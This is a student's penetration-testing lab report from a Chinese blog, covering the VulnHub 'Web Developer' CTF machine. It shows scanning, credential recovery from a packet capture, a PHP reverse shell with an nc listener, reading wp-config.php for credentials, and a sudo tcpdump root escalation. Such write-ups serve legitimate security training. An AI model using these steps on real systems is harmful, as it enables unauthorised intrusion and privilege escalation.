网络渗透测试实验四

whale_bi

已于 2022-02-25 22:28:31 修改

阅读量3.9k

点赞数

分类专栏：安全漏洞文章标签：安全漏洞 wireshark 安全网络

于 2021-12-13 15:54:49 首次发布

本文链接：https://blog.csdn.net/babywhale_bi/article/details/121906705

版权

安全漏洞专栏收录该内容

6 篇文章 0 订阅

订阅专栏

网络渗透测试实验报告

实验目的

通过对目标靶机的渗透过程，了解CTF竞赛模式，理解CTF涵盖的知识范围，如MISC、PPC、WEB等，通过实践，加强团队协作能力，掌握初步CTF实战能力及信息收集能力。熟悉网络扫描、探测HTTP web服务、目录枚举、提权、图像信息提取、密码破解等相关工具的使用，系统环境：Kali Linux 2、WebDeveloper靶机来源：https://www.vulnhub.com/

实验工具：不限

实验内容、原理

目的：获取靶机Web Developer 文件/root/flag.txt中flag。

基本思路：本网段IP地址存活扫描(netdiscover)；网络扫描(Nmap)；浏览HTTP 服务；网站目录枚举(Dirb)；发现数据包文件 “cap”；分析 “cap” 文件，找到网站管理后台账号密码；插件利用（有漏洞）；利用漏洞获得服务器账号密码；SSH 远程登录服务器；tcpdump另类应用。

实验过程

发现目标 (netdiscover)，找到WebDeveloper的IP地址。截图。

2.:利用NMAP扫描目标主机，发现目标主机端口开放、服务情况，截图并说明目标提供的服务有哪些？（利用第一次实验知识点）

目标主机提供了ssh服务和http服务；

若目标主机提供了HTTP服务，尝试利用浏览器访问目标网站。截图。是否有可用信息？

在虚拟机浏览器中打开扫描到的目标主机的IP地址，看到如下界面

4.利用whatweb探测目标网站使用的CMS模板。截图。分析使用的CMS是什么？

输入whatweb -v 192.168.127.130（目标主机ip），得如下命令

分析到使用的CMS（内容管理系统）是WordPress site

网络搜索wpscan，简要说明其功能

WPScan是Kali Linux默认自带的一款漏洞扫描工具，它采用Ruby编写，能够扫描WordPress网站中的多种安全漏洞，其中包括WordPress本身的漏洞、插件漏洞和主题漏洞。最新版本WPScan的数据库中包含超过18000种插件漏洞和2600种主题漏洞，并且支持最新版本的WordPress。值得注意的是，它不仅能够扫描类似robots.txt这样的敏感文件，而且还能够检测当前已启用的插件和其他功能。

WordPress是全球流行的博客网站，全球有上百万人使用它来搭建博客。他使用PHP脚本和Mysql数据库来搭建网站。

使用 Dirb 爆破网站目录。（Dirb 是一个专门用于爆破目录的工具，在 Kali 中默认已经安装，类似工具还有国外的patator，dirsearch，DirBuster，国内的御剑）截图。找到一个似乎和网络流量有关的目录（路径）。

在kali输入dirb http://192.168.127.130 爆破目录网站，找到DIRECTORY:http：//192.168.127.130/ipdata/

浏览器访问该目录（路径），发现一个cap文件。截图。

发现cap文件并下载；

利用Wireshark分析该数据包，分析TCP数据流。找到什么有用的信息？截图。

把cap文件扔到wireshark分析抓包数据，输入http.request.method==POST过滤，找到想要抓包的数据

发现了目标主机网站的账户和密码；

复制登录http：//192.168.127.130网站后台；

在浏览器中搜索http://pentestmonkey.net/tools/web-shells/php-reverse-shell

点击download，下载，并打开，复制其中的代码；

在后台中找到任意一个PHP页面，利用刚刚复制到的代码复制粘贴其中，修改代码中反弹目标的IP地址“192.168.127.133”及端口“4444”

接下来，在kali中打开，输入命令nc -lvp 4444，利用NC开始监听，并打开浏览器访问修改的PHP页面，从而得到反弹shell（用户www-data）。建立会话后，输入cat/var/www/html/wp-config.php

查看wp-config.php获得账号及口令。

紧接着输入

输入命令ssh webdeveloper@192.168.127.133 （ssh 用户名@目标主机IP）

继续输入password；发现可以root权限执行tcpdump命令，输入下面的几个命令

创建攻击文件

touch /tmp/exploit1

写入shellcode

echo 'cat /root/flag.txt' > /tmp/exploit

赋予可执行权限

chmod +x /tmp/exploit

利用tcpdump执行任意命令

sudo tcpdump -i eth0 -w /dev/null -W 1 -G 1 -z /tmp/exploit -Z root

找到flag；

实验完成。

实验小结

本次实验我的收获很大，学会了如何利用插件漏洞，用wireshake打开目标主机网站的数据库文件并抓包，找到该网站管理后台的用户名和密码，用枚举dirb爆破网站目录，获得服务器的账号密码，让它代替我们执行一些命令，但是在实验的过程中，对一些命令以及一些专业术语不太了解，还需要进一步查资料，记录下来。

whale_bi

关注

0
点赞
踩
22

收藏

觉得还不错? 一键收藏
0
评论
网络渗透测试实验四

网络渗透测试实验报告实验目的通过对目标靶机的渗透过程，了解CTF竞赛模式，理解CTF涵盖的知识范围，如MISC、PPC、WEB等，通过实践，加强团队协作能力，掌握初步CTF实战能力及信息收集能力。熟悉网络扫描、探测HTTP web服务、目录枚举、提权、图像信息提取、密码破解等相关工具的使用，系统环境：Kali Linux 2、WebDeveloper靶机来源：https://www.vulnhub.com/实验工具：不限实验内容、原理目的：获取靶机Web Developer 文件/roo..
复制链接

扫一扫

专栏目录